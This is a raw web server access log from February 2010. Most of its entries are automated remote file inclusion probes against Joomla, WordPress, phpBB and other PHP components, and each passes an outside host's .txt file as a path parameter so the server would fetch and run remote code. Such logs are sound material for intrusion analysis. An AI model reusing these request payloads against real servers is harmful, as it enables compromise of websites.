85.12.33.30 - - [23/Feb/2010:01:38:15 -0500] "GET /logs//wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=http://www.hubns.co.kr//data/list/heheh.txt??? HTTP/1.1" 404 265 "-" "Mozilla/5.0"
85.12.33.30 - - [23/Feb/2010:01:38:15 -0500] "GET /logs/access_log.Q109120700//wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=http://www.hubns.co.kr//data/list/heheh.txt??? HTTP/1.1" 404 287 "-" "Mozilla/5.0"
203.250.124.252 - - [23/Feb/2010:01:38:23 -0500] "GET //components/com_jd-wp/wp-feed.php?mosConfig_absolute_path=http://opale-parapente.com/mag/images/baner.txt? HTTP/1.1" 404 231 "-" "Mozilla/5.0"
203.250.124.252 - - [23/Feb/2010:01:38:23 -0500] "GET /logs/access_log.Q110020400//components/com_jd-wp/wp-feed.php?mosConfig_absolute_path=http://opale-parapente.com/mag/images/baner.txt? HTTP/1.1" 404 258 "-" "Mozilla/5.0"
203.250.124.252 - - [23/Feb/2010:01:38:23 -0500] "GET /logs//components/com_jd-wp/wp-feed.php?mosConfig_absolute_path=http://opale-parapente.com/mag/images/baner.txt? HTTP/1.1" 404 236 "-" "Mozilla/5.0"
69.16.237.166 - - [23/Feb/2010:01:38:24 -0500] "GET /logs/access_log.Q110020200/index.php?option=com_virtuemart&page=shop.browse&category_id=&keyword=&manufacturer_id=&Itemid=&mosConfig_absolute_path=http://ppdkubangpasu.net/v2/x1.txt??? HTTP/1.1" 404 234 "-" "Mozilla/5.0"
85.12.33.30 - - [23/Feb/2010:01:38:24 -0500] "GET /logs//wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=http://www.hubns.co.kr//data/list/heheh.txt??? HTTP/1.1" 404 265 "-" "Mozilla/5.0"
85.12.33.30 - - [23/Feb/2010:01:38:24 -0500] "GET /logs/access_log.Q109120700//wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=http://www.hubns.co.kr//data/list/heheh.txt??? HTTP/1.1" 404 287 "-" "Mozilla/5.0"
58.230.162.220 - - [23/Feb/2010:01:39:02 -0500] "GET //modules/PNphpBB2/includes/functions_admin.php?phpbb_root_path=http://zerozon.co.kr/data/eeng/id1.txt?? HTTP/1.1" 404 244 "-" "Mozilla/5.0"
58.230.162.220 - - [23/Feb/2010:01:39:02 -0500] "GET /logs//modules/PNphpBB2/includes/functions_admin.php?phpbb_root_path=http://zerozon.co.kr/data/eeng/id1.txt?? HTTP/1.1" 404 249 "-" "Mozilla/5.0"
58.230.162.220 - - [23/Feb/2010:01:39:02 -0500] "GET /logs/access_log.Q109101500%20%20//modules/PNphpBB2/includes/functions_admin.php?phpbb_root_path=http://zerozon.co.kr/data/eeng/id1.txt?? HTTP/1.1" 404 273 "-" "Mozilla/5.0"
89.36.175.10 - - [23/Feb/2010:01:39:04 -0500] "GET /logs//administrator/components/com_pollxt/conf.pollxt.php?mosConfig_absolute_path=http://201.199.194.8/conta/auto1.txt?? HTTP/1.1" 404 255 "-" "Mozilla/5.0"
89.36.175.10 - - [23/Feb/2010:01:39:04 -0500] "GET //administrator/components/com_pollxt/conf.pollxt.php?mosConfig_absolute_path=http://201.199.194.8/conta/auto1.txt?? HTTP/1.1" 404 250 "-" "Mozilla/5.0"
89.36.175.10 - - [23/Feb/2010:01:39:04 -0500] "GET /logs/access_log.Q109062700%20%20//administrator/components/com_pollxt/conf.pollxt.php?mosConfig_absolute_path=http://201.199.194.8/conta/auto1.txt?? HTTP/1.1" 404 279 "-" "Mozilla/5.0"
211.115.68.54 - - [23/Feb/2010:01:39:07 -0500] "GET /index.php?conteudo=http://www.cienciacompartida.org////id1.txt??? HTTP/1.1" 404 207 "-" "Mozilla/5.0"
211.115.68.54 - - [23/Feb/2010:01:39:09 -0500] "GET /logs/index.php?conteudo=http://www.cienciacompartida.org////id1.txt??? HTTP/1.1" 404 212 "-" "Mozilla/5.0"
211.115.68.54 - - [23/Feb/2010:01:39:09 -0500] "GET /logs/access_log.Q109122200/index.php?conteudo=http://www.cienciacompartida.org////id1.txt??? HTTP/1.1" 404 234 "-" "Mozilla/5.0"
58.230.162.220 - - [23/Feb/2010:01:39:12 -0500] "GET /logs//modules/PNphpBB2/includes/functions_admin.php?phpbb_root_path=http://zerozon.co.kr/data/eeng/id1.txt?? HTTP/1.1" 404 249 "-" "Mozilla/5.0"
58.230.162.220 - - [23/Feb/2010:01:39:12 -0500] "GET //modules/PNphpBB2/includes/functions_admin.php?phpbb_root_path=http://zerozon.co.kr/data/eeng/id1.txt?? HTTP/1.1" 404 244 "-" "Mozilla/5.0"
58.230.162.220 - - [23/Feb/2010:01:39:12 -0500] "GET /logs/access_log.Q109101500%20%20//modules/PNphpBB2/includes/functions_admin.php?phpbb_root_path=http://zerozon.co.kr/data/eeng/id1.txt?? HTTP/1.1" 404 273 "-" "Mozilla/5.0"
211.115.68.54 - - [23/Feb/2010:01:39:14 -0500] "GET /logs/access_log.Q109090300/index.php?conteudo=http://www.cienciacompartida.org////id1.txt??? HTTP/1.1" 404 234 "-" "Mozilla/5.0"
89.36.175.10 - - [23/Feb/2010:01:39:17 -0500] "GET /logs/access_log.Q109112000%20%20//administrator/components/com_pollxt/conf.pollxt.php?mosConfig_absolute_path=http://201.199.194.8/conta/auto1.txt?? HTTP/1.1" 404 279 "-" "Mozilla/5.0"
211.115.68.54 - - [23/Feb/2010:01:39:29 -0500] "GET /index.php?conteudo=http://www.cienciacompartida.org////id1.txt??? HTTP/1.1" 404 207 "-" "Mozilla/5.0"
211.115.68.54 - - [23/Feb/2010:01:39:29 -0500] "GET /logs/index.php?conteudo=http://www.cienciacompartida.org////id1.txt??? HTTP/1.1" 404 212 "-" "Mozilla/5.0"
211.115.68.54 - - [23/Feb/2010:01:39:30 -0500] "GET /logs/access_log.Q109122200/index.php?conteudo=http://www.cienciacompartida.org////id1.txt??? HTTP/1.1" 404 234 "-" "Mozilla/5.0"
211.115.68.54 - - [23/Feb/2010:01:39:30 -0500] "GET /logs/access_log.Q109090300/index.php?conteudo=http://www.cienciacompartida.org////id1.txt??? HTTP/1.1" 404 234 "-" "Mozilla/5.0"
91.121.228.9 - - [23/Feb/2010:01:40:20 -0500] "GET /logs/error_log.Q109082100/%22BBCode%22http://91.121.228.9/index2.html??? HTTP/1.1" 404 273 "-" "libwww-perl/5.805"
91.121.228.9 - - [23/Feb/2010:01:40:20 -0500] "GET /logs/access_log.Q109082100/%22BBCode%22http://91.121.228.9/index2.html??? HTTP/1.1" 404 274 "-" "libwww-perl/5.805"
91.121.228.9 - - [23/Feb/2010:01:40:20 -0500] "GET /%22BBCode%22http://91.121.228.9/index2.html??? HTTP/1.1" 404 247 "-" "libwww-perl/5.805"
91.121.228.9 - - [23/Feb/2010:01:40:20 -0500] "GET /logs/%22BBCode%22http://91.121.228.9/index2.html??? HTTP/1.1" 404 252 "-" "libwww-perl/5.805"
85.12.33.30 - - [23/Feb/2010:01:40:40 -0500] "GET //wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=http://www.hubns.co.kr//data/list/heheh.txt??? HTTP/1.1" 404 260 "-" "Mozilla/5.0"
85.12.33.30 - - [23/Feb/2010:01:40:40 -0500] "GET /logs/access_log.Q109120700//wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=http://www.hubns.co.kr//data/list/heheh.txt??? HTTP/1.1" 404 287 "-" "Mozilla/5.0"
85.12.33.30 - - [23/Feb/2010:01:40:40 -0500] "GET /logs//wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=http://www.hubns.co.kr//data/list/heheh.txt??? HTTP/1.1" 404 265 "-" "Mozilla/5.0"
85.12.33.30 - - [23/Feb/2010:01:40:41 -0500] "GET //wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=http://www.hubns.co.kr//data/list/heheh.txt??? HTTP/1.1" 404 260 "-" "Mozilla/5.0"
85.12.33.30 - - [23/Feb/2010:01:40:41 -0500] "GET /logs//wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=http://www.hubns.co.kr//data/list/heheh.txt??? HTTP/1.1" 404 265 "-" "Mozilla/5.0"
85.12.33.30 - - [23/Feb/2010:01:40:42 -0500] "GET /logs/access_log.Q109120700//wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=http://www.hubns.co.kr//data/list/heheh.txt??? HTTP/1.1" 404 287 "-" "Mozilla/5.0"
85.12.33.30 - - [23/Feb/2010:01:40:54 -0500] "GET //wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=http://www.hubns.co.kr//data/list/heheh.txt??? HTTP/1.1" 404 260 "-" "Mozilla/5.0"
85.12.33.30 - - [23/Feb/2010:01:40:54 -0500] "GET /logs//wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=http://www.hubns.co.kr//data/list/heheh.txt??? HTTP/1.1" 404 265 "-" "Mozilla/5.0"
85.12.33.30 - - [23/Feb/2010:01:40:54 -0500] "GET /logs/access_log.Q109120700//wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=http://www.hubns.co.kr//data/list/heheh.txt??? HTTP/1.1" 404 287 "-" "Mozilla/5.0"
85.12.33.30 - - [23/Feb/2010:01:40:55 -0500] "GET //wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=http://www.hubns.co.kr//data/list/heheh.txt??? HTTP/1.1" 404 260 "-" "Mozilla/5.0"
85.12.33.30 - - [23/Feb/2010:01:40:55 -0500] "GET /logs//wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=http://www.hubns.co.kr//data/list/heheh.txt??? HTTP/1.1" 404 265 "-" "Mozilla/5.0"
85.12.33.30 - - [23/Feb/2010:01:40:55 -0500] "GET /logs/access_log.Q109120700//wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=http://www.hubns.co.kr//data/list/heheh.txt??? HTTP/1.1" 404 287 "-" "Mozilla/5.0"
58.230.162.220 - - [23/Feb/2010:01:41:24 -0500] "GET /logs/access_log.Q109062900%20%20//modules/PNphpBB2/includes/functions_admin.php?phpbb_root_path=http://zerozon.co.kr/data/eeng/id1.txt?? HTTP/1.1" 404 273 "-" "Mozilla/5.0"
58.230.162.220 - - [23/Feb/2010:01:41:26 -0500] "GET /logs/access_log.Q109062900%20%20//modules/PNphpBB2/includes/functions_admin.php?phpbb_root_path=http://zerozon.co.kr/data/eeng/id1.txt?? HTTP/1.1" 404 273 "-" "Mozilla/5.0"
64.15.152.132 - - [23/Feb/2010:01:41:43 -0500] "GET /logs/error_log.Q110021100//ams/amboard/index.php?_SERVER[DOCUMENT_ROOT]=http://www.kortech.cn/bbs/data/id1.txt? HTTP/1.1" 404 246 "-" "Mozilla/5.0"
66.254.98.142 - - [23/Feb/2010:01:41:45 -0500] "GET /modules/PNphpBB2/includes/functions_admin.php?phpbb_root_path=http://www.moterostrailmadrid.es/blocks/ts??? HTTP/1.1" 404 243 "-" "Microsoft Pocket Internet Explorer/0.6"
66.254.98.142 - - [23/Feb/2010:01:41:45 -0500] "GET /logs/modules/PNphpBB2/includes/functions_admin.php?phpbb_root_path=http://www.moterostrailmadrid.es/blocks/ts??? HTTP/1.1" 404 248 "-" "Microsoft Pocket Internet Explorer/0.6"
67.195.115.186 - - [23/Feb/2010:01:41:22 -0500] "GET /logs/error_log.Q109110400 HTTP/1.0" 200 2627411 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)"
80.23.181.2 - - [23/Feb/2010:01:41:58 -0500] "GET /components/com_zoom/classes/iptc/EXIF_Makernote.php?mosConfig_absolute_path=http://www.3hdigital.com/cert/fx29id.txt? HTTP/1.1" 404 249 "-" "Mozilla/5.0"
80.23.181.2 - - [23/Feb/2010:01:41:58 -0500] "GET /logs/access_log.Q109051000%20%20/components/com_zoom/classes/iptc/EXIF_Makernote.php?mosConfig_absolute_path=http://www.3hdigital.com/cert/fx29id.txt? HTTP/1.1" 404 278 "-" "Mozilla/5.0"
80.23.181.2 - - [23/Feb/2010:01:41:58 -0500] "GET /logs/components/com_zoom/classes/iptc/EXIF_Makernote.php?mosConfig_absolute_path=http://www.3hdigital.com/cert/fx29id.txt? HTTP/1.1" 404 254 "-" "Mozilla/5.0"
213.171.37.206 - - [23/Feb/2010:01:42:01 -0500] "GET /logs/access_log.Q110021300//templates/errors.php?error=http://www.trait-union.ch/cgi-bin/joomla/components/com_extcalendar/id.txt???? HTTP/1.1" 404 246 "-" "libwww-perl/5.808"
213.171.37.206 - - [23/Feb/2010:01:42:01 -0500] "GET //templates/errors.php?error=http://www.trait-union.ch/cgi-bin/joomla/components/com_extcalendar/id.txt???? HTTP/1.1" 404 219 "-" "libwww-perl/5.808"
213.171.37.206 - - [23/Feb/2010:01:42:02 -0500] "GET /logs//templates/errors.php?error=http://www.trait-union.ch/cgi-bin/joomla/components/com_extcalendar/id.txt???? HTTP/1.1" 404 224 "-" "libwww-perl/5.808"
62.193.225.60 - - [23/Feb/2010:01:42:03 -0500] "GET /logs/access_log.Q109051200%20%20//components/com_jd-wp/wp-feed.php?mosConfig_absolute_path=http://www.kaastl.com/convert/baner.txt?? HTTP/1.1" 404 260 "-" "Mozilla/5.0"
62.193.225.60 - - [23/Feb/2010:01:42:26 -0500] "GET /logs/error_log.Q109051200%20%20//components/com_jd-wp/wp-feed.php?mosConfig_absolute_path=http://www.kaastl.com/convert/baner.txt?? HTTP/1.1" 404 259 "-" "Mozilla/5.0"
200.93.147.154 - - [23/Feb/2010:01:42:35 -0500] "GET /logs/access_log.Q109102900//administrator/components/com_pollxt/conf.pollxt.php?mosConfig_absolute_path=http://www.cienciacompartida.org////id1.txt??? HTTP/1.1" 404 277 "-" "Mozilla/5.0"
62.193.225.60 - - [23/Feb/2010:01:42:43 -0500] "GET /logs/access_log.Q109121300%20%20//components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.kaastl.com/convert/baner.txt?? HTTP/1.1" 404 278 "-" "Mozilla/5.0"
209.59.12.99 - - [23/Feb/2010:01:43:01 -0500] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
203.250.124.252 - - [23/Feb/2010:01:43:03 -0500] "GET /logs/access_log.Q109112900%20%20//components/com_jd-wp/wp-feed.php?mosConfig_absolute_path=http://opale-parapente.com/mag/images/baner.txt? HTTP/1.1" 404 260 "-" "Mozilla/5.0"
203.250.124.252 - - [23/Feb/2010:01:43:22 -0500] "GET /logs/access_log.Q110020400%20%20//components/com_jd-wp/wp-feed.php?mosConfig_absolute_path=http://opale-parapente.com/mag/images/baner.txt? HTTP/1.1" 404 260 "-" "Mozilla/5.0"
64.15.152.132 - - [23/Feb/2010:01:43:38 -0500] "GET /logs/error_log.Q110021100//ams/amboard/index.php?_SERVER[DOCUMENT_ROOT]=http://www.kortech.cn/bbs/data/id1.txt? HTTP/1.1" 404 246 "-" "Mozilla/5.0"
202.167.221.65 - - [23/Feb/2010:01:43:41 -0500] "GET /logs/access_log.Q109121300%20%20//components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.kaastl.com/convert/baner.txt?? HTTP/1.1" 404 278 "-" "Mozilla/5.0"
200.93.147.154 - - [23/Feb/2010:01:43:50 -0500] "GET /logs/error_log.Q109100600//bookmark4u/lostpasswd.php?env[include_prefix]=http://www.howtolisten.kr//bbs/icon/private_name/id1.txt??? HTTP/1.1" 404 250 "-" "Mozilla/5.0"
200.226.134.154 - - [23/Feb/2010:01:43:55 -0500] "GET //appserv/main.php?appserv_root=http://www.gzzsyy.com.cn/brd/id1.txt?? HTTP/1.1" 404 215 "-" "Mozilla/5.0"
200.226.134.154 - - [23/Feb/2010:01:43:55 -0500] "GET /logs//appserv/main.php?appserv_root=http://www.gzzsyy.com.cn/brd/id1.txt?? HTTP/1.1" 404 220 "-" "Mozilla/5.0"
200.226.134.154 - - [23/Feb/2010:01:43:55 -0500] "GET /logs/access_log.Q109051800//appserv/main.php?appserv_root=http://www.gzzsyy.com.cn/brd/id1.txt?? HTTP/1.1" 404 242 "-" "Mozilla/5.0"
202.167.221.65 - - [23/Feb/2010:01:44:03 -0500] "GET /logs/access_log.Q109120500%20%20//components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.kaastl.com/convert/baner.txt?? HTTP/1.1" 404 278 "-" "Mozilla/5.0"
62.193.225.60 - - [23/Feb/2010:01:44:04 -0500] "GET /logs/error_log.Q109121300%20%20//components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.kaastl.com/convert/baner.txt?? HTTP/1.1" 404 277 "-" "Mozilla/5.0"
200.226.134.154 - - [23/Feb/2010:01:44:08 -0500] "GET /logs/access_log.Q109110900//appserv/main.php?appserv_root=http://www.gzzsyy.com.cn/brd/id1.txt?? HTTP/1.1" 404 242 "-" "Mozilla/5.0"
211.39.137.162 - - [23/Feb/2010:01:44:21 -0500] "GET /logs/access_log.Q109112500%20%20//components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://opale-parapente.com/mag/images/baner.txt? HTTP/1.1" 404 278 "-" "Mozilla/5.0"
211.39.137.162 - - [23/Feb/2010:01:44:37 -0500] "GET /logs/access_log.Q109121300//components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://opale-parapente.com/mag/images/baner.txt? HTTP/1.1" 404 276 "-" "Mozilla/5.0"
74.6.149.53 - - [23/Feb/2010:01:44:51 -0500] "GET /robots.txt HTTP/1.0" 404 208 "-" "Mozilla/5.0 (Yahoo-MMCrawler/4.0; mailto:vertical-crawl-support@yahoo-inc.com)"
74.6.149.53 - - [23/Feb/2010:01:44:51 -0500] "GET /images/0034211_full.jpg HTTP/1.0" 200 17733 "-" "Mozilla/5.0 (Yahoo-MMCrawler/4.0; mailto:vertical-crawl-support@yahoo-inc.com)"
213.171.37.206 - - [23/Feb/2010:01:45:55 -0500] "GET /logs/error_log.Q110021300//templates/errors.php?error=http://www.trait-union.ch/cgi-bin/joomla/components/com_extcalendar/id.txt???? HTTP/1.1" 404 245 "-" "libwww-perl/5.808"
203.250.124.252 - - [23/Feb/2010:01:46:55 -0500] "GET /logs/access_log.Q109112500%20%20//components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://opale-parapente.com/mag/images/baner.txt? HTTP/1.1" 404 278 "-" "Mozilla/5.0"
200.226.134.154 - - [23/Feb/2010:01:47:02 -0500] "GET /logs/error_log.Q109050700//appserv/main.php?appserv_root=http://www.gzzsyy.com.cn/brd/id1.txt?? HTTP/1.1" 404 241 "-" "Mozilla/5.0"
202.167.221.65 - - [23/Feb/2010:01:47:19 -0500] "GET /logs/access_log.Q109051200%20%20//components/com_jd-wp/wp-feed.php?mosConfig_absolute_path=http://www.kaastl.com/convert/baner.txt?? HTTP/1.1" 404 260 "-" "Mozilla/5.0"
62.193.225.60 - - [23/Feb/2010:01:47:22 -0500] "GET /logs/access_log.Q109121300//components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.kaastl.com/convert/baner.txt?? HTTP/1.1" 404 276 "-" "Mozilla/5.0"
202.167.221.65 - - [23/Feb/2010:01:47:55 -0500] "GET /logs/error_log.Q109111700%20%20//components/com_jd-wp/wp-feed.php?mosConfig_absolute_path=http://www.kaastl.com/convert/baner.txt?? HTTP/1.1" 404 259 "-" "Mozilla/5.0"
66.254.98.142 - - [23/Feb/2010:01:48:02 -0500] "GET /logs/modules/PNphpBB2/includes/functions_admin.php?phpbb_root_path=http://www.moterostrailmadrid.es/blocks/ts??? HTTP/1.1" 404 248 "-" "Microsoft Pocket Internet Explorer/0.6"
66.254.98.142 - - [23/Feb/2010:01:48:03 -0500] "GET /modules/PNphpBB2/includes/functions_admin.php?phpbb_root_path=http://www.moterostrailmadrid.es/blocks/ts??? HTTP/1.1" 404 243 "-" "Microsoft Pocket Internet Explorer/0.6"
200.150.6.42 - - [23/Feb/2010:01:48:03 -0500] "GET /setup.php?dir=http://www.destockdetout.com//components/com_virtuemart/idxx.txt?? HTTP/1.1" 404 207 "-" "Mozilla/5.0"
200.150.6.42 - - [23/Feb/2010:01:48:03 -0500] "GET /logs/access_log.Q109092200/setup.php?dir=http://www.destockdetout.com//components/com_virtuemart/idxx.txt?? HTTP/1.1" 404 234 "-" "Mozilla/5.0"
200.150.6.42 - - [23/Feb/2010:01:48:03 -0500] "GET /logs/setup.php?dir=http://www.destockdetout.com//components/com_virtuemart/idxx.txt?? HTTP/1.1" 404 212 "-" "Mozilla/5.0"
200.150.6.42 - - [23/Feb/2010:01:48:09 -0500] "GET /setup.php?dir=http://www.destockdetout.com//components/com_virtuemart/idxx.txt?? HTTP/1.1" 404 207 "-" "Mozilla/5.0"
200.150.6.42 - - [23/Feb/2010:01:48:09 -0500] "GET /logs/setup.php?dir=http://www.destockdetout.com//components/com_virtuemart/idxx.txt?? HTTP/1.1" 404 212 "-" "Mozilla/5.0"
200.150.6.42 - - [23/Feb/2010:01:48:09 -0500] "GET /logs/access_log.Q109092200/setup.php?dir=http://www.destockdetout.com//components/com_virtuemart/idxx.txt?? HTTP/1.1" 404 234 "-" "Mozilla/5.0"
186.28.232.13 - - [23/Feb/2010:01:48:21 -0500] "GET /logs//templates/errors.php?error=http://jspo.org/images/gallery/id.txt??? HTTP/1.1" 404 224 "-" "libwww-perl/5.805"
186.28.232.13 - - [23/Feb/2010:01:48:21 -0500] "GET /logs/access_log.Q109051000//templates/errors.php?error=http://jspo.org/images/gallery/id.txt??? HTTP/1.1" 404 246 "-" "libwww-perl/5.805"
186.28.232.13 - - [23/Feb/2010:01:48:21 -0500] "GET //templates/errors.php?error=http://jspo.org/images/gallery/id.txt??? HTTP/1.1" 404 219 "-" "libwww-perl/5.805"
70.86.5.10 - - [23/Feb/2010:01:48:40 -0500] "GET /logs/access_log.Q109051000//templates/errors.php?error=http://jspo.org/images/gallery/id.txt??? HTTP/1.1" 404 246 "-" "libwww-perl/5.805"
70.86.5.10 - - [23/Feb/2010:01:48:40 -0500] "GET /logs//templates/errors.php?error=http://jspo.org/images/gallery/id.txt??? HTTP/1.1" 404 224 "-" "libwww-perl/5.805"
70.86.5.10 - - [23/Feb/2010:01:48:40 -0500] "GET //templates/errors.php?error=http://jspo.org/images/gallery/id.txt??? HTTP/1.1" 404 219 "-" "libwww-perl/5.805"
66.249.71.109 - - [23/Feb/2010:01:49:59 -0500] "GET /CGI-BIN/LANSAWEB?WEBEVENT+L0151455103319600808B01F+M37+ENG HTTP/1.1" 500 197 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
62.193.225.60 - - [23/Feb/2010:01:50:10 -0500] "GET /logs/access_log.Q109111700//components/com_jd-wp/wp-feed.php?mosConfig_absolute_path=http://www.kaastl.com/convert/baner.txt?? HTTP/1.1" 404 258 "-" "Mozilla/5.0"
202.167.221.65 - - [23/Feb/2010:01:50:21 -0500] "GET /logs/access_log.Q109091000//index.php?option=com_registration&&Itemid=&mosConfig_absolute_path=http://www.kaastl.com/convert/baner.txt?? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
70.86.5.10 - - [23/Feb/2010:01:50:21 -0500] "GET /logs/access_log.Q109051000%20//templates/errors.php?error=http://jspo.org/images/gallery/id.txt??? HTTP/1.1" 404 247 "-" "libwww-perl/5.805"
99.68.226.181 - - [23/Feb/2010:01:50:37 -0500] "GET /favicon.ico HTTP/1.1" 404 209 "-" "Mozilla/4.0 (compatible; GoogleToolbar 6.4.1321.1732; Windows 6.0; MSIE 7.0.6001.18000)"
99.68.226.181 - - [23/Feb/2010:01:50:38 -0500] "GET /favicon.gif HTTP/1.1" 404 209 "-" "Mozilla/4.0 (compatible; GoogleToolbar 6.4.1321.1732; Windows 6.0; MSIE 7.0.6001.18000)"
209.59.12.99 - - [23/Feb/2010:01:51:05 -0500] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
202.167.221.65 - - [23/Feb/2010:01:51:09 -0500] "GET /logs/access_log.Q109101800//index.php?option=com_registration&&Itemid=&mosConfig_absolute_path=http://www.kaastl.com/convert/baner.txt?? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
66.254.98.142 - - [23/Feb/2010:01:51:12 -0500] "GET /modules/PNphpBB2/includes/functions_admin.php?phpbb_root_path=http://www.moterostrailmadrid.es/blocks/ts??? HTTP/1.1" 404 243 "-" "Microsoft Pocket Internet Explorer/0.6"
66.254.98.142 - - [23/Feb/2010:01:51:13 -0500] "GET /logs/modules/PNphpBB2/includes/functions_admin.php?phpbb_root_path=http://www.moterostrailmadrid.es/blocks/ts??? HTTP/1.1" 404 248 "-" "Microsoft Pocket Internet Explorer/0.6"
186.28.232.13 - - [23/Feb/2010:01:51:36 -0500] "GET /logs/access_log.Q109051000%20//templates/errors.php?error=http://jspo.org/images/gallery/id.txt??? HTTP/1.1" 404 247 "-" "libwww-perl/5.805"
66.254.98.142 - - [23/Feb/2010:01:51:38 -0500] "GET //delete_comment.php?board_skin_path=http://www.britishschool.it/british//dmdocuments/test.txt??? HTTP/1.1" 404 217 "-" "Mozilla/4.0 (compatible; MSIE 6.0; MSN 2.5; Windows 98)"
66.254.98.142 - - [23/Feb/2010:01:51:38 -0500] "GET /logs//delete_comment.php?board_skin_path=http://www.britishschool.it/british//dmdocuments/test.txt??? HTTP/1.1" 404 222 "-" "Mozilla/4.0 (compatible; MSIE 6.0; MSN 2.5; Windows 98)"
89.36.175.10 - - [23/Feb/2010:01:51:51 -0500] "GET /logs/access_log.Q109112000//administrator/components/com_pollxt/conf.pollxt.php?mosConfig_absolute_path=http://201.199.194.8/conta/auto1.txt?? HTTP/1.1" 404 277 "-" "Mozilla/5.0"
200.93.147.154 - - [23/Feb/2010:01:52:18 -0500] "GET /logs/error_log.Q109100600//bookmark4u/lostpasswd.php?env[include_prefix]=http://www.howtolisten.kr//bbs/icon/private_name/id1.txt??? HTTP/1.1" 404 250 "-" "Mozilla/5.0"
89.36.175.10 - - [23/Feb/2010:01:52:31 -0500] "GET /logs/error_log.Q110011200//administrator/components/com_pollxt/conf.pollxt.php?mosConfig_absolute_path=http://201.199.194.8/conta/auto1.txt?? HTTP/1.1" 404 276 "-" "Mozilla/5.0"
62.193.225.60 - - [23/Feb/2010:01:54:05 -0500] "GET /logs/error_log.Q110021800//components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.kaastl.com/convert/baner.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0"
200.150.6.42 - - [23/Feb/2010:01:54:58 -0500] "GET //setup.php?dir=http://www.destockdetout.com//components/com_virtuemart/idxx.txt??? HTTP/1.1" 404 208 "-" "Mozilla/5.0"
200.150.6.42 - - [23/Feb/2010:01:54:58 -0500] "GET /logs//setup.php?dir=http://www.destockdetout.com//components/com_virtuemart/idxx.txt??? HTTP/1.1" 404 213 "-" "Mozilla/5.0"
200.150.6.42 - - [23/Feb/2010:01:54:58 -0500] "GET /logs/access_log.Q109092200//setup.php?dir=http://www.destockdetout.com//components/com_virtuemart/idxx.txt??? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
66.249.71.219 - - [23/Feb/2010:01:54:59 -0500] "GET /cgi-bin/LANSAWEB?PROCFUN+WORDPR01+FULLIMG+M37+FUNCPARMS+WEBCMP(S0020):1+WEBSSN(A0240):L004C54341001410026B0031+WSEQ(S0060):1+OUITEM(A0200):05560000 HTTP/1.1" 200 27013 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
200.93.147.154 - - [23/Feb/2010:01:55:09 -0500] "GET //setup.php?dir=http://www.destockdetout.com//components/com_virtuemart/idxx.txt??? HTTP/1.1" 404 208 "-" "Mozilla/5.0"
200.93.147.154 - - [23/Feb/2010:01:55:09 -0500] "GET /logs//setup.php?dir=http://www.destockdetout.com//components/com_virtuemart/idxx.txt??? HTTP/1.1" 404 213 "-" "Mozilla/5.0"
200.93.147.154 - - [23/Feb/2010:01:55:09 -0500] "GET /logs/access_log.Q109092200//setup.php?dir=http://www.destockdetout.com//components/com_virtuemart/idxx.txt??? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
89.36.175.10 - - [23/Feb/2010:01:55:56 -0500] "GET /logs/access_log.Q109062700//administrator/components/com_pollxt/conf.pollxt.php?mosConfig_absolute_path=http://201.199.194.8/conta/auto1.txt?? HTTP/1.1" 404 277 "-" "Mozilla/5.0"
202.167.221.65 - - [23/Feb/2010:01:57:02 -0500] "GET //cms/classes/openengine/filepool.php?oe_classpath=http://www.kaastl.com/convert/baner.txt?? HTTP/1.1" 404 234 "-" "Mozilla/5.0"
